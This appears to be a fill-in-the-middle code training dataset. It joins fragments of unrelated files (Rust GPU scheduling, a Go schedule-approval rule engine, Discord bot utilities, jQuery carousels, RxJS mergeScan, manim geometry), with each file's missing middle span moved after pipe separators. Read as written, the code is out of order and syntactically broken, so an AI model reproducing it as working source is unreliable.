for node in nodes {
let family = node.family;
if !family_full.contains_key(&family) {
let count = max_queues(family);
assert!(count > 0, "Cannot create a family with 0 max queues.");
for i in 0..count {
queues.forward(QueueId::new(family, i));
}
let full_range = queues.forward(QueueId::new(family, 0))
..queues.forward(QueueId::new(family, count - 1)) + 1;
family_full.insert(family, full_range);
}
let id = node_ids.forward(node.id);
assert!(id < node_count, "Dependency not found."); // This implies a dep is not there.
let unscheduled_count = node.dependencies.len();
for dep in node.dependencies {
// Duplicated dependencies work fine, since they push two rev_deps entries and add two
// to unscheduled_nodes.
reified_nodes[node_ids.forward(dep)].rev_deps.push(id);
}
unscheduled_nodes[id] = unscheduled_count;
// We set these manually, and notably, do *not* touch rev_deps.
reified_nodes[id].id = id;
reified_nodes[id].family = node.family;
reified_nodes[id].queues = family_full[&family].clone();
reified_nodes[id].buffers = node
.buffers
.into_iter()
.map(|(k, v)| (buffers.forward(k), v))
.collect();
reified_nodes[id].images = node
.images
.into_iter()
.map(|(k, v)| (images.forward(k), v))
.collect();
}
(
ResolvedNodeSet {
nodes: reified_nodes,
queues: queues.backward,
buffers: buffers.backward,
images: images.backward,
},
unscheduled_nodes,
)
}
fn | <R: Resource>(ids: &[Id], vec: Vec<ChainData<R>>) -> FnvHashMap<Id, Chain<R>> {
let mut map = FnvHashMap::with_capacity_and_hasher(vec.len(), Default::default());
for (chain, &i) in vec.into_iter().zip(ids) {
map.insert(i, chain.chain);
}
map
}
fn reify_schedule(vec: Vec<QueueData>) -> Schedule<Unsynchronized> {
let mut schedule = Schedule::new();
for queue_data in vec.into_iter() {
schedule.set_queue(queue_data.queue);
}
schedule
}
fn fitness(
node: &ResolvedNode,
images: &mut Vec<ChainData<Image>>,
buffers: &mut Vec<ChainData<Buffer>>,
schedule: &mut Vec<QueueData>,
) -> (Fitness, usize) {
let mut transfers = 0;
let mut wait_factor_from_chains = 0;
// Collect minimal waits required and resource transfers count.
for &(id, _) in &node.buffers {
let chain = &buffers[id];
if chain
.current_family
.map_or(false, |family| family != node.family)
{
transfers += 1;
}
wait_factor_from_chains = max(wait_factor_from_chains, chain.last_link_wait_factor);
}
for &(id, _) in &node.images {
let chain = &images[id];
if chain
.current_family
.map_or(false, |family| family != node.family)
{
transfers += 1;
}
wait_factor_from_chains = max(wait_factor_from_chains, chain.last_link_wait_factor);
}
// Find best queue for node.
let (wait_factor_from_queue, queue) = node
.queues
.clone()
.map(|index| (schedule[index].wait_factor, index))
.min()
.unwrap();
(
Fitness {
transfers,
wait_factor: max(wait_factor_from_chains, wait_factor_from_queue),
},
queue,
)
}
fn schedule_node<'a>(
ready_nodes: &mut Vec<&'a ResolvedNode>,
unscheduled_nodes: &mut Vec<usize>,
nodes: &'a ResolvedNodeSet,
node: &ResolvedNode,
queue: usize,
wait_factor: usize,
submitted: usize,
schedule: &mut Vec<QueueData>,
images: &mut Vec<ChainData<Image>>,
buffers: &mut Vec<ChainData<Buffer>>,
) {
let ref mut queue_data = schedule[queue];
queue_data.wait_factor = max(queue_data.wait_factor, wait_factor + 1);
let sid = queue_data
.queue
.add_submission(node.id, wait_factor, submitted, Unsynchronized);
let submission = queue_data.queue.submission_mut(sid).unwrap();
for &(id, state) in &node.buffers {
add_to_chain(
nodes.buffers[id],
node.family,
&mut buffers[id],
sid,
submission,
state,
);
}
for &(id, state) in &node.images {
add_to_chain(
nodes.images[id],
node.family,
&mut images[id],
sid,
submission,
state,
);
}
for &rev_dep in &node.rev_deps {
unscheduled_nodes[rev_dep] -= 1;
if unscheduled_nodes[rev_dep] == 0 {
ready_nodes.push(&nodes.nodes[rev_dep]);
}
}
}
fn add_to_chain<R, S>(
id: Id,
family: FamilyId,
chain_data: &mut ChainData<R>,
sid: SubmissionId,
submission: &mut Submission<S>,
state: State<R>,
) where
R: Resource,
{
let node = LinkNode { sid, state };
chain_data.current_family = Some(family);
chain_data.current_link_wait_factor = max(
submission.wait_factor() + 1,
chain_data.current_link_wait_factor,
);
let ref mut chain = chain_data.chain;
let chain_len = chain.links().len();
let append = match chain.last_link_mut() {
Some(ref mut link) if link.compatible(&node) => {
submission.set_link(id, chain_len - 1);
link.add_node(node);
None
}
Some(_) | None => {
submission.set_link(id, chain_len);
chain_data.last_link_wait_factor = chain_data.current_link_wait_factor;
Some(Link::new(node))
}
};
if let Some(link) = append {
chain.add_link(link);
}
}
| reify_chain |
engine_schedule_rules.go | package approvalrulesprocessing
import (
"context"
"errors"
"fmt"
"strconv"
"strings"
"time"
"github.com/fullstaq-labs/sqedule/server/dbmodels"
"github.com/fullstaq-labs/sqedule/server/dbmodels/releasestate"
)
func (engine Engine) fetchScheduleRulePreviousOutcomes() (map[uint64]bool, error) {
outcomes, err := dbmodels.FindScheduleApprovalRuleOutcomes(engine.Db, engine.OrganizationID, engine.ReleaseBackgroundJob.ReleaseID)
if err != nil {
return nil, err
}
return indexScheduleRuleOutcomes(outcomes), nil
}
func (engine Engine) processScheduleRules(rulesetContents dbmodels.ApprovalRulesetContents, previousOutcomes map[uint64]bool, nAlreadyProcessed uint) (releasestate.State, uint, error) {
var nprocessed uint = 0
var totalRules uint = rulesetContents.NumRules()
for _, rule := range rulesetContents.ScheduleApprovalRules {
success, outcomeAlreadyRecorded, err := engine.processScheduleRule(rule, previousOutcomes)
if err != nil {
return releasestate.Rejected, nprocessed,
maybeFormatRuleProcessingError(err, "Error processing schedule rule org=%s, ID=%d: %w",
engine.OrganizationID, rule.ID, err)
}
nprocessed++
resultState, ignoredError := determineReleaseStateFromOutcome(success, rule.BindingMode, isLastRule(nAlreadyProcessed, nprocessed, totalRules))
engine.Db.Logger.Info(context.Background(),
"Processed schedule rule: org=%s, ID=%d, success=%t, ignoredError=%t, resultState=%s",
engine.OrganizationID, rule.ID, success, ignoredError, resultState)
if !outcomeAlreadyRecorded {
event, err := engine.createRuleProcessedEvent(resultState, ignoredError)
if err != nil {
return releasestate.Rejected, nprocessed,
fmt.Errorf("Error recording release event: %w", err)
}
err = engine.createScheduleRuleOutcome(rule, event, success)
if err != nil {
return releasestate.Rejected, nprocessed,
fmt.Errorf("Error recording schedule approval rule outcome: %w", err)
}
}
if resultState.IsFinal() {
return resultState, nprocessed, nil
}
}
return determineReleaseStateAfterProcessingRules(nAlreadyProcessed, nprocessed, totalRules),
nprocessed, nil
}
func determineReleaseStateAfterProcessingRules(nAlreadyProcessed uint, nprocessed uint, totalRules uint) releasestate.State {
if isLastRule(nAlreadyProcessed, nprocessed, totalRules) {
return releasestate.Approved
}
return releasestate.InProgress
}
func (engine Engine) processScheduleRule(rule dbmodels.ScheduleApprovalRule, previousOutcomes map[uint64]bool) (bool, bool, error) {
success, exists := previousOutcomes[rule.ID]
if exists {
return success, true, nil
}
// TODO: if there's an error, reject the release because the rules have errors
success, err := timeIsWithinSchedule(engine.ReleaseBackgroundJob.Release.CreatedAt, rule)
return success, false, err
}
func (engine Engine) createScheduleRuleOutcome(rule dbmodels.ScheduleApprovalRule, event dbmodels.ReleaseRuleProcessedEvent, success bool) error {
outcome := dbmodels.ScheduleApprovalRuleOutcome{
ApprovalRuleOutcome: dbmodels.ApprovalRuleOutcome{
BaseModel: dbmodels.BaseModel{
OrganizationID: engine.OrganizationID,
},
ReleaseRuleProcessedEventID: event.ReleaseEvent.ID,
Success: success,
},
ScheduleApprovalRuleID: rule.ApprovalRule.ID,
}
tx := engine.Db.Create(&outcome)
if tx.Error != nil {
return tx.Error
}
return nil
}
func indexScheduleRuleOutcomes(outcomes []dbmodels.ScheduleApprovalRuleOutcome) map[uint64]bool {
result := make(map[uint64]bool)
for _, outcome := range outcomes {
result[outcome.ScheduleApprovalRuleID] = outcome.Success
}
return result
}
func timeIsWithinSchedule(releaseTime time.Time, rule dbmodels.ScheduleApprovalRule) (bool, error) {
if rule.BeginTime.Valid {
if !rule.EndTime.Valid { |
parsedBeginTime, err := parseScheduleTime(releaseTime, rule.BeginTime.String)
if err != nil {
return false, fmt.Errorf("Error parsing begin time '%s': %w", rule.BeginTime.String, err)
}
parsedEndTime, err := parseScheduleTime(releaseTime, rule.EndTime.String)
if err != nil {
return false, fmt.Errorf("Error parsing end time '%s': %w", rule.EndTime.String, err)
}
if releaseTime.Before(parsedBeginTime) || releaseTime.After(parsedEndTime) {
return false, nil
}
}
if rule.DaysOfWeek.Valid {
parsedWeekDays, err := parseScheduleWeekDays(rule.DaysOfWeek.String)
if err != nil {
return false, fmt.Errorf("Error parsing days of week '%s': %w", rule.DaysOfWeek.String, err)
}
if !parsedWeekDays[releaseTime.Weekday()] {
return false, nil
}
}
if rule.DaysOfMonth.Valid {
parsedMonthDays, err := parseScheduleMonthDays(rule.DaysOfMonth.String)
if err != nil {
return false, fmt.Errorf("Error parsing days of month '%s': %w", rule.DaysOfMonth.String, err)
}
if !parsedMonthDays[releaseTime.Day()] {
return false, nil
}
}
if rule.MonthsOfYear.Valid {
parsedMonths, err := parseScheduleMonths(rule.MonthsOfYear.String)
if err != nil {
return false, fmt.Errorf("Error parsing months '%s': %w", rule.MonthsOfYear.String, err)
}
if !parsedMonths[releaseTime.Month()] {
return false, nil
}
}
return true, nil
}
// parseScheduleTime parses a ScheduleApprovalRule time string. It returns a `time.Time`
// whose date is equal to `date`, but whose time equals that of the time string.
//
// `str` has the format of `HH:MM[:SS]`.
//
// Example:
//
// parseScheduleTime(time.Date(2021, 2, 19, 0, 0, 0), "12:32") // => 2021-02-19 12:32
func parseScheduleTime(date time.Time, str string) (time.Time, error) {
components := strings.SplitN(str, ":", 3)
if len(components) < 2 {
return time.Time{}, errors.New("Invalid time format (HH:MM[:SS] expected)")
}
var hour, minute, second int64
var err error
hour, err = strconv.ParseInt(components[0], 10, 8)
if err != nil {
return time.Time{}, fmt.Errorf("Error parsing hour component: %w", err)
}
if hour < 0 || hour > 24 {
return time.Time{}, fmt.Errorf("Error parsing hour component: %d is not a valid value", hour)
}
minute, err = strconv.ParseInt(components[1], 10, 8)
if err != nil {
return time.Time{}, fmt.Errorf("Error parsing minute component: %w", err)
}
if minute < 0 || minute > 60 {
return time.Time{}, fmt.Errorf("Error parsing minute component: %d is not a valid value", minute)
}
if len(components) == 3 {
second, err = strconv.ParseInt(components[2], 10, 8)
if err != nil {
return time.Time{}, fmt.Errorf("Error parsing second component: %w", err)
}
if second < 0 || second > 60 {
return time.Time{}, fmt.Errorf("Error parsing second component: %d is not a valid value", second)
}
} else {
second = 0
}
result := time.Date(date.Year(), date.Month(), date.Day(), int(hour), int(minute), int(second), 0, date.Location())
return result, nil
}
func parseScheduleWeekDays(str string) (map[time.Weekday]bool, error) {
result := make(map[time.Weekday]bool)
for _, day := range strings.Split(str, " ") {
switch strings.ToLower(day) {
case "1", "mon", "monday":
result[time.Monday] = true
case "2", "tue", "tuesday":
result[time.Tuesday] = true
case "3", "wed", "wednesday":
result[time.Wednesday] = true
case "4", "thu", "thursday":
result[time.Thursday] = true
case "5", "fri", "friday":
result[time.Friday] = true
case "6", "sat", "saturday":
result[time.Saturday] = true
case "0", "7", "sun", "sunday":
result[time.Sunday] = true
case "":
continue
default:
return nil, fmt.Errorf("'%s' is not a recognized weekday", day)
}
}
return result, nil
}
func parseScheduleMonthDays(str string) (map[int]bool, error) {
result := make(map[int]bool)
for _, day := range strings.Split(str, " ") {
if len(day) == 0 {
continue
}
dayInt, err := strconv.Atoi(day)
if err != nil {
return nil, fmt.Errorf("Error parsing month day '%s': %w", day, err)
}
if dayInt < 0 || dayInt > 31 {
return nil, fmt.Errorf("Month day '%s' is not a valid day", day)
}
result[int(dayInt)] = true
}
return result, nil
}
func parseScheduleMonths(str string) (map[time.Month]bool, error) {
result := make(map[time.Month]bool)
for _, month := range strings.Split(str, " ") {
switch strings.ToLower(month) {
case "1", "jan", "january":
result[time.January] = true
case "2", "feb", "february":
result[time.February] = true
case "3", "mar", "march":
result[time.March] = true
case "4", "apr", "april":
result[time.April] = true
case "5", "may":
result[time.May] = true
case "6", "jun", "june":
result[time.June] = true
case "7", "jul", "july":
result[time.July] = true
case "8", "aug", "august":
result[time.August] = true
case "9", "sep", "september":
result[time.September] = true
case "10", "oct", "october":
result[time.October] = true
case "11", "nov", "november":
result[time.November] = true
case "12", "dec", "december":
result[time.December] = true
case "":
continue
default:
return nil, fmt.Errorf("'%s' is not a recognized month", month)
}
}
return result, nil
} | panic(fmt.Sprintf("ScheduleApprovalRule %d: BeginTime non-null, but EndTime null", rule.ApprovalRule.ID))
} |
utils.py | from typing import Dict, List, Optional, Union
import contextlib
import asyncio
import discord
from discord.ext import pages
from database import DatabasePersonality, DatabaseDeck
# Set authorized guilds for slash command (return [] for global command - might take up to 1h to register)
def get_authorized_guild_ids():
return [550631040826343427]
async def personalities_name_searcher(ctx: discord.AutocompleteContext):
return [perso['name'] for perso in DatabasePersonality.get().get_all_personalities()
if ctx.value.lower() in perso['name'].lower()]
async def personalities_group_searcher(ctx: discord.AutocompleteContext):
return [group for group in DatabasePersonality.get().get_all_groups() if ctx.value.lower() in group.lower()]
async def wishlist_name_searcher(ctx: discord.AutocompleteContext):
ids = DatabaseDeck.get().get_wishlist(ctx.interaction.guild.id, ctx.interaction.user.id)
personalities = DatabasePersonality.get().get_multiple_perso_information(ids)
return [perso['name'] for perso in personalities
if ctx.value.lower() in perso['name'].lower()]
async def shopping_list_name_searcher(ctx: discord.AutocompleteContext):
ids = DatabaseDeck.get().get_shopping_list(ctx.interaction.guild.id, ctx.interaction.user.id)
personalities = DatabasePersonality.get().get_multiple_perso_information(ids)
return [perso['name'] for perso in personalities
if ctx.value.lower() in perso['name'].lower()]
async def deck_name_searcher(ctx: discord.AutocompleteContext):
ids = DatabaseDeck.get().get_user_deck(ctx.interaction.guild.id, ctx.interaction.user.id)
personalities = DatabasePersonality.get().get_multiple_perso_information(ids)
return [perso['name'] for perso in personalities
if ctx.value.lower() in perso['name'].lower()]
async def badges_name_searcher(ctx: discord.AutocompleteContext):
badges = DatabaseDeck.get().get_all_badges(ctx.interaction.guild.id)
return [badge['name'] for badge in badges if ctx.value.lower() in badge['name'].lower()]
class ConfirmView(discord.ui.View):
def __init__(self, authorized_user: discord.User, timeout: int = 60):
super().__init__(timeout=timeout)
self.is_accepted = None
self.authorized_user = authorized_user
@discord.ui.button(label="Yes", style=discord.ButtonStyle.green)
async def yes(
self, button: discord.ui.Button, interaction: discord.Interaction
):
self.is_accepted = True
button.label = 'Yes (chosen)'
await self.disable_update_and_stop(interaction)
@discord.ui.button(label="No", style=discord.ButtonStyle.red)
async def no(
self, button: discord.ui.Button, interaction: discord.Interaction
):
self.is_accepted = False
button.label = 'No (chosen)'
await self.disable_update_and_stop(interaction)
async def interaction_check(self, interaction: discord.Interaction):
if interaction.user != self.authorized_user:
await interaction.response.send_message('You cannot answer, you are not the recipient.', ephemeral=True)
return False
return True
async def on_timeout(self):
await self.disable()
async def disable_update_and_stop(self, interaction: discord.Interaction):
await self.disable()
await interaction.response.edit_message(view=self)
self.stop()
async def disable(self):
for child in self.children:
child.disabled = True
class PaginatorCustomStartPage(pages.Paginator):
def __init__(
self,
pages: Union[List[str], List[discord.Embed]],
author_check=True,
custom_view: Optional[discord.ui.View] = None,
timeout: Optional[float] = 180.0,
first_page: int = 0
) -> None:
super().__init__(pages=pages, show_disabled=True, show_indicator=True, author_check=author_check,
disable_on_timeout=True, custom_view=custom_view, timeout=timeout)
if first_page >= len(pages):
first_page = len(pages) - 1
elif first_page < 0:
|
self.current_page = first_page
self.update_buttons()
async def respond(self, interaction: discord.Interaction, ephemeral: bool = False):
"""Sends an interaction response or followup with the paginated items.
Parameters
------------
interaction: :class:`discord.Interaction`
The interaction associated with this response.
ephemeral: :class:`bool`
Choose whether the message is ephemeral or not.
Returns
--------
:class:`~discord.Interaction`
The message sent with the paginator.
"""
page = self.pages[self.current_page]
self.user = interaction.user
if interaction.response.is_done():
msg = await interaction.followup.send(
content=page if isinstance(page, str) else None, embed=page if isinstance(page, discord.Embed) else None, view=self, ephemeral=ephemeral
)
else:
msg = await interaction.response.send_message(
content=page if isinstance(page, str) else None, embed=page if isinstance(page, discord.Embed) else None, view=self, ephemeral=ephemeral
)
if isinstance(msg, (discord.WebhookMessage, discord.Message)):
self.message = msg
elif isinstance(msg, discord.Interaction):
self.message = await msg.original_message()
return self.message
# https://stackoverflow.com/questions/49622924/wait-for-timeout-or-event-being-set-for-asyncio-event
async def event_wait(event: asyncio.Event, timeout: float):
# suppress TimeoutError because we'll return False in case of timeout
with contextlib.suppress(asyncio.TimeoutError):
await asyncio.wait_for(event.wait(), timeout)
return event.is_set()
| first_page = 0 |
main.js | $(document).ready(function() {
$("#nav-mobile").mmenu();
$("#owl-slider").owlCarousel({
pagination: true,
autoPlay: true,
slideSpeed: 300,
paginationSpeed: 400,
singleItem: true
});
$("#owl-news").owlCarousel({
pagination: false,
slideSpeed: 300,
paginationSpeed: 400,
singleItem: true
});
$("#owl-seminor").owlCarousel({
pagination: false,
slideSpeed: 300,
paginationSpeed: 400,
singleItem: true
});
$("#owl-testimonial").owlCarousel({
autoPlay: 3000,
items : 2,
itemsDesktop : [1199,2],
itemsDesktopSmall : [992,1],
itemsMobile : [767,1]
});
$("#owl-product-images").owlCarousel({
autoPlay: 3000,
pagination: false,
items : 4,
itemsDesktop : [1199,4],
itemsDesktopSmall : [992,4],
itemsMobile : [767,4]
});
$("#owl-brand").owlCarousel({
pagination: false,
slideSpeed: 300,
paginationSpeed: 400,
items: 5,
itemsDesktop : [1199,5],
itemsDesktopSmall : [992,5]
});
// if( $(window).width() < 768) {
// $("#owl-school").owlCarousel({
// slideSpeed: 300,
// paginationSpeed: 400,
// singleItem: true
// });
// }
// $(window).resize(function(){
// if( $(window).width() < 768) {
// $("#owl-school").owlCarousel({
// slideSpeed: 300,
// paginationSpeed: 400,
// singleItem: true
// });
// }
// });
$("#owl-product-images .item a").on("click", function(){
var data_image = $(this).attr("data-image");
$("#product-image-feature img").attr( "src", data_image);
});
$(".product-tabs-title li a").on("click", function(){
var data_tab = $(this).attr("data-tab");
$(".product-tabs-title li").removeClass("active");
$(this).parent().addClass("active");
$(".tab-content").removeClass("active");
$("#" + data_tab).addClass("active");
});
$("#owl-product-related").owlCarousel({
autoPlay: 3000,
pagination: false,
items : 4,
itemsDesktop : [1199,4],
itemsDesktopSmall : [992,4],
itemsMobile : [767,1]
});
var sync1 = $("#sync1");
var sync2 = $("#sync2");
sync1.owlCarousel({
singleItem : true,
slideSpeed : 1000,
navigation: true,
pagination:false,
afterAction : syncPosition,
responsiveRefreshRate : 200,
});
sync2.owlCarousel({
items : 5,
itemsDesktop : [1199,5],
itemsDesktopSmall : [979,5],
itemsTablet : [768,4],
itemsMobile : [479,3],
pagination:false,
responsiveRefreshRate : 100,
afterInit : function(el){
el.find(".owl-item").eq(0).addClass("synced");
}
});
function | (el){
var current = this.currentItem;
$("#sync2")
.find(".owl-item")
.removeClass("synced")
.eq(current)
.addClass("synced")
if($("#sync2").data("owlCarousel") !== undefined){
}
}
$("#sync2").on("click", ".owl-item", function(e){
e.preventDefault();
var number = $(this).data("owlItem");
sync1.trigger("owl.goTo",number);
});
}); | syncPosition |
ImportPreviewColumn.type.ts | isValid: boolean;
}; | export type ImportPreviewColumn = {
value: any; |
|
mergeScan.ts | import { Operator } from '../Operator';
import { Observable } from '../Observable';
import { Subscriber } from '../Subscriber';
import { ObservableInput, OperatorFunction } from '../types';
import { lift } from '../util/lift';
import { SimpleInnerSubscriber, SimpleOuterSubscriber, innerSubscribe } from '../innerSubscribe';
/**
* Applies an accumulator function over the source Observable where the
* accumulator function itself returns an Observable, then each intermediate
* Observable returned is merged into the output Observable.
*
* <span class="informal">It's like {@link scan}, but the Observables returned
* by the accumulator are merged into the outer Observable.</span>
*
* ## Example
* Count the number of click events
* ```ts
* import { fromEvent, of } from 'rxjs';
* import { mapTo, mergeScan } from 'rxjs/operators';
*
* const click$ = fromEvent(document, 'click');
* const one$ = click$.pipe(mapTo(1));
* const seed = 0;
* const count$ = one$.pipe(
* mergeScan((acc, one) => of(acc + one), seed),
* );
* count$.subscribe(x => console.log(x));
*
* // Results:
* // 1 | * // 4
* // ...and so on for each click
* ```
*
* @param {function(acc: R, value: T): Observable<R>} accumulator
* The accumulator function called on each source value.
* @param seed The initial accumulation value.
* @param {number} [concurrent=Infinity] Maximum number of
* input Observables being subscribed to concurrently.
* @return {Observable<R>} An observable of the accumulated values.
* @name mergeScan
*/
export function mergeScan<T, R>(accumulator: (acc: R, value: T, index: number) => ObservableInput<R>,
seed: R,
concurrent: number = Infinity): OperatorFunction<T, R> {
return (source: Observable<T>) => lift(source, new MergeScanOperator(accumulator, seed, concurrent));
}
export class MergeScanOperator<T, R> implements Operator<T, R> {
constructor(private accumulator: (acc: R, value: T, index: number) => ObservableInput<R>,
private seed: R,
private concurrent: number) {
}
call(subscriber: Subscriber<R>, source: any): any {
return source.subscribe(new MergeScanSubscriber(
subscriber, this.accumulator, this.seed, this.concurrent
));
}
}
/**
* We need this JSDoc comment for affecting ESDoc.
* @ignore
* @extends {Ignored}
*/
export class MergeScanSubscriber<T, R> extends SimpleOuterSubscriber<T, R> {
private hasValue: boolean = false;
private hasCompleted: boolean = false;
private buffer: Observable<any>[] = [];
private active: number = 0;
protected index: number = 0;
constructor(protected destination: Subscriber<R>,
private accumulator: (acc: R, value: T, index: number) => ObservableInput<R>,
private acc: R,
private concurrent: number) {
super(destination);
}
protected _next(value: any): void {
if (this.active < this.concurrent) {
const index = this.index++;
const destination = this.destination;
let ish;
try {
const { accumulator } = this;
ish = accumulator(this.acc, value, index);
} catch (e) {
return destination.error(e);
}
this.active++;
this._innerSub(ish);
} else {
this.buffer.push(value);
}
}
private _innerSub(ish: any): void {
const innerSubscriber = new SimpleInnerSubscriber(this);
this.destination.add(innerSubscriber);
innerSubscribe(ish, innerSubscriber);
}
protected _complete(): void {
this.hasCompleted = true;
if (this.active === 0 && this.buffer.length === 0) {
if (this.hasValue === false) {
this.destination.next(this.acc);
}
this.destination.complete();
}
this.unsubscribe();
}
notifyNext(innerValue: R): void {
const { destination } = this;
this.acc = innerValue;
this.hasValue = true;
destination.next(innerValue);
}
notifyComplete(): void {
const buffer = this.buffer;
this.active--;
if (buffer.length > 0) {
this._next(buffer.shift());
} else if (this.active === 0 && this.hasCompleted) {
if (this.hasValue === false) {
this.destination.next(this.acc);
}
this.destination.complete();
}
}
} | * // 2
* // 3 |
opengl_geometry.py | import numpy as np
from .. import logger
from ..constants import *
from ..mobject.mobject import Mobject
from ..mobject.types.opengl_vectorized_mobject import (
OpenGLDashedVMobject,
OpenGLVGroup,
OpenGLVMobject,
)
from ..utils.color import *
from ..utils.deprecation import deprecated_params
from ..utils.iterables import adjacent_n_tuples, adjacent_pairs
from ..utils.simple_functions import clip, fdiv
from ..utils.space_ops import (
angle_between_vectors,
angle_of_vector,
compass_directions,
find_intersection,
normalize,
rotate_vector,
rotation_matrix_transpose,
)
DEFAULT_DOT_RADIUS = 0.08
DEFAULT_SMALL_DOT_RADIUS = 0.04
DEFAULT_DASH_LENGTH = 0.05
DEFAULT_ARROW_TIP_LENGTH = 0.35
DEFAULT_ARROW_TIP_WIDTH = 0.35
class OpenGLTipableVMobject(OpenGLVMobject):
"""
Meant for shared functionality between Arc and Line.
Functionality can be classified broadly into these groups:
* Adding, Creating, Modifying tips
- add_tip calls create_tip, before pushing the new tip
into the TipableVMobject's list of submobjects
- stylistic and positional configuration
* Checking for tips
- Boolean checks for whether the TipableVMobject has a tip
and a starting tip
* Getters
- Straightforward accessors, returning information pertaining
to the TipableVMobject instance's tip(s), its length etc
"""
# Adding, Creating, Modifying tips
def __init__(
self,
tip_length=DEFAULT_ARROW_TIP_LENGTH,
normal_vector=OUT,
tip_config={},
**kwargs
):
self.tip_length = tip_length
self.normal_vector = normal_vector
self.tip_config = tip_config
OpenGLVMobject.__init__(self, **kwargs)
def add_tip(self, at_start=False, **kwargs):
"""
Adds a tip to the TipableVMobject instance, recognising
that the endpoints might need to be switched if it's
a 'starting tip' or not.
"""
tip = self.create_tip(at_start, **kwargs)
self.reset_endpoints_based_on_tip(tip, at_start)
self.asign_tip_attr(tip, at_start)
self.add(tip)
return self
def create_tip(self, at_start=False, **kwargs):
"""
Stylises the tip, positions it spacially, and returns
the newly instantiated tip to the caller.
"""
tip = self.get_unpositioned_tip(**kwargs)
self.position_tip(tip, at_start)
return tip
def get_unpositioned_tip(self, **kwargs):
"""
Returns a tip that has been stylistically configured,
but has not yet been given a position in space.
"""
config = {}
config.update(self.tip_config)
config.update(kwargs)
return OpenGLArrowTip(**config)
def position_tip(self, tip, at_start=False):
# Last two control points, defining both
# the end, and the tangency direction
if at_start:
anchor = self.get_start()
handle = self.get_first_handle()
else:
handle = self.get_last_handle()
anchor = self.get_end()
tip.rotate(angle_of_vector(handle - anchor) - PI - tip.get_angle())
tip.shift(anchor - tip.get_tip_point())
return tip
def reset_endpoints_based_on_tip(self, tip, at_start):
if self.get_length() == 0:
# Zero length, put_start_and_end_on wouldn't
# work
return self
if at_start:
start = tip.get_base()
end = self.get_end()
else:
start = self.get_start()
end = tip.get_base()
self.put_start_and_end_on(start, end)
return self
def asign_tip_attr(self, tip, at_start):
if at_start:
self.start_tip = tip
else:
self.tip = tip
return self
# Checking for tips
def has_tip(self):
return hasattr(self, "tip") and self.tip in self
def has_start_tip(self):
return hasattr(self, "start_tip") and self.start_tip in self
# Getters
def pop_tips(self):
start, end = self.get_start_and_end()
result = OpenGLVGroup()
if self.has_tip():
result.add(self.tip)
self.remove(self.tip)
if self.has_start_tip():
result.add(self.start_tip)
self.remove(self.start_tip)
self.put_start_and_end_on(start, end)
return result
def get_tips(self):
"""
Returns a VGroup (collection of VMobjects) containing
the TipableVMObject instance's tips.
"""
result = OpenGLVGroup()
if hasattr(self, "tip"):
result.add(self.tip)
if hasattr(self, "start_tip"):
result.add(self.start_tip)
return result
def get_tip(self):
"""Returns the TipableVMobject instance's (first) tip,
otherwise throws an exception."""
tips = self.get_tips()
if len(tips) == 0:
raise Exception("tip not found")
else:
return tips[0]
def get_default_tip_length(self):
return self.tip_length
def get_first_handle(self):
return self.points[1]
def get_last_handle(self):
return self.points[-2]
def get_end(self):
if self.has_tip():
return self.tip.get_start()
else:
return OpenGLVMobject.get_end(self)
def get_start(self):
if self.has_start_tip():
return self.start_tip.get_start()
else:
return OpenGLVMobject.get_start(self)
def get_length(self):
start, end = self.get_start_and_end()
return np.linalg.norm(start - end)
class OpenGLArc(OpenGLTipableVMobject):
def __init__(
self,
start_angle=0,
angle=TAU / 4,
radius=1.0,
n_components=8,
arc_center=ORIGIN,
**kwargs
):
self.start_angle = start_angle
self.angle = angle
self.radius = radius
self.n_components = n_components
self.arc_center = arc_center
super().__init__(self, **kwargs)
self.orientation = -1
def init_points(self):
self.set_points(
OpenGLArc.create_quadratic_bezier_points(
angle=self.angle,
start_angle=self.start_angle,
n_components=self.n_components,
)
)
# To maintain proper orientation for fill shaders.
self.scale(self.radius, about_point=ORIGIN)
self.shift(self.arc_center)
@staticmethod
def create_quadratic_bezier_points(angle, start_angle=0, n_components=8):
samples = np.array(
[
[np.cos(a), np.sin(a), 0]
for a in np.linspace(
start_angle,
start_angle + angle,
2 * n_components + 1,
)
]
)
theta = angle / n_components
samples[1::2] /= np.cos(theta / 2)
points = np.zeros((3 * n_components, 3))
points[0::3] = samples[0:-1:2]
points[1::3] = samples[1::2]
points[2::3] = samples[2::2]
return points
def get_arc_center(self):
"""
Looks at the normals to the first two
anchors, and finds their intersection points
"""
# First two anchors and handles
a1, h, a2 = self.points[:3]
# Tangent vectors
t1 = h - a1
t2 = h - a2
# Normals
n1 = rotate_vector(t1, TAU / 4)
n2 = rotate_vector(t2, TAU / 4)
return find_intersection(a1, n1, a2, n2)
def get_start_angle(self):
angle = angle_of_vector(self.get_start() - self.get_arc_center())
return angle % TAU
def get_stop_angle(self):
angle = angle_of_vector(self.get_end() - self.get_arc_center())
return angle % TAU
def move_arc_center_to(self, point):
self.shift(point - self.get_arc_center())
return self
class OpenGLArcBetweenPoints(OpenGLArc):
def __init__(self, start, end, angle=TAU / 4, **kwargs):
super().__init__(angle=angle, **kwargs)
if angle == 0:
self.set_points_as_corners([LEFT, RIGHT])
self.put_start_and_end_on(start, end)
class OpenGLCurvedArrow(OpenGLArcBetweenPoints):
def __init__(self, start_point, end_point, **kwargs):
OpenGLArcBetweenPoints.__init__(self, start_point, end_point, **kwargs)
self.add_tip()
class OpenGLCurvedDoubleArrow(OpenGLCurvedArrow):
def __init__(self, start_point, end_point, **kwargs):
OpenGLCurvedArrow.__init__(self, start_point, end_point, **kwargs)
self.add_tip(at_start=True)
class OpenGLCircle(OpenGLArc):
def __init__(self, color=RED, **kwargs):
OpenGLArc.__init__(self, 0, TAU, color=color, **kwargs)
def surround(self, mobject, dim_to_match=0, stretch=False, buff=MED_SMALL_BUFF):
# Ignores dim_to_match and stretch; result will always be a circle
# TODO: Perhaps create an ellipse class to handle singele-dimension stretching
self.replace(mobject, dim_to_match, stretch)
self.stretch((self.get_width() + 2 * buff) / self.get_width(), 0)
self.stretch((self.get_height() + 2 * buff) / self.get_height(), 1)
def point_at_angle(self, angle):
start_angle = self.get_start_angle()
return self.point_from_proportion((angle - start_angle) / TAU)
class OpenGLDot(OpenGLCircle):
def __init__(
self,
point=ORIGIN,
radius=DEFAULT_DOT_RADIUS,
stroke_width=0,
fill_opacity=1.0,
color=WHITE,
**kwargs
):
super().__init__(
arc_center=point,
radius=radius,
stroke_width=stroke_width,
fill_opacity=fill_opacity,
color=color,
**kwargs
)
class OpenGLEllipse(OpenGLCircle):
def __init__(self, width=2, height=1, **kwargs):
super().__init__(**kwargs)
self.set_width(width, stretch=True)
